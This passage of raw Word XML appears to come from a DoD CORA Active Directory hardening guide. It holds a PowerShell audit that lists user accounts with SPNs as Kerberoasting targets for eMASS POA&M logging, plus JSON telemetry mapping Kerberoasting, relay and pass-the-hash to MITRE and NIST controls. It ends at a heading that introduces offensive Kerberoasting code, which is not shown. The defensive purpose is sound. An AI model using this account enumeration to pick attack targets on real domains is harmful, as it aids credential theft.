          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$_</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.Enabled -eq </w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$true</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -and </w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$_</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.SamAccountName -notlike </w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"*$"</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$KerberoastTargets</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        Write-Warning </w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"[!] Found potential Kerberoasting targets! Logging to file for eMASS POA&amp;M tracking..."</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$KerberoastTargets</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Select-Object SamAccountName, UserPrincipalName, ServicePrincipalName | </w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        Export-Csv -Path </w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"C:\Windows\Temp\CORA_Kerberoast_POA_M.csv"</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -NoTypeInformation</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    } </w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        Write-Output </w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"[+] No high-risk user-level SPNs discovered."</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>} catch {</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    Write-Warning </w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"[-] ActiveDirectory PowerShell module not found. Skipping Domain-level SPN check."</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Write-Output </w:t>
      </w:r>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"[*] POA&amp;M Automation Loop Completed successfully."</w:t>
      </w:r>
      <w:r w:rsidR="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B09D782" w14:textId="734DA028" w:rsidR="00133311" w:rsidRPr="00133311" w:rsidRDefault="00133311" w:rsidP="00133311">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B1C0D10" w14:textId="77777777" w:rsidR="00133311" w:rsidRPr="00133311" w:rsidRDefault="00133311" w:rsidP="00133311">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Automated eMASS PO&amp;M Logging Logic (JSON Telemetry)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2DDFB3" w14:textId="77777777" w:rsidR="00133311" w:rsidRDefault="00133311" w:rsidP="00133311">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00133311">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To stream your automated compliance checks straight to an eMASS dashboard or SIEM database, ingest your automation results using a standardized structure. This telemetry maps the attack type, the target configuration state, and the exact security control being verified:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537FD9BC" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00133311">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DEA2478" w14:textId="77777777" w:rsidR="00133311" w:rsidRDefault="00133311">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  "AssessmentEngine": </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>"CORA-Continuous-Hardening-Loop"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  "Timestamp": </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>"2026-06-06T20:30:00Z"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  "PoAM_Tracking_ID": </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>"POAM-AD-HARDENING-004"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  "TargetVulnerability": {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "AttackVector": </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>"Kerberoasting / Relay Attacks / PtH"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "MitreAttackID": </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>"T1558.003 / T1557 / T1550.002"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "NistRev5Mapping": [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>"AC-2"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>"IA-5"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>"SC-8"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>"AC-4"</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444444"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  "RemediationExecution": {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "LLMNR_Status": </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>"Disabled"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "SMBSigning_Status": </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>"Enforced_Required"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "UserSPNAudit": </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>"Completed_LogGenerated"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "SystemComplianceState": </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>"Compliant"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  },</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  "eMassTelemetry": {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "ArtifactLocation": </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>"C:\\Windows\\Temp\\CORA_Kerberoast_POA_M.csv"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "ContinuousMonitoringStatus": </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>"Passed"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "InheritanceEligible": </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="78A960"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD3656A" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="000B6E74">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F0D01C6" w14:textId="787140E4" w:rsidR="00133311" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="000B6E74">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Defending Against Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E591809" w14:textId="3D96CE43" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To effectively defend a Department of Defense Information Network (D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DIN) environment under the Cyber Operational Readiness Assessment (CORA) framework, defenders must understand exactly how adversaries execute attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFC143E" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Below are highly detailed, technical breakdowns and operational code demonstrations showing how attackers execute these techniques, paired immediately with the precise "red flags" and artifacts defenders must monitor to catch them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F214746" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>1. Offensive Logic: Kerberoasting Execution</w:t>
      </w:r>
    </w:p>
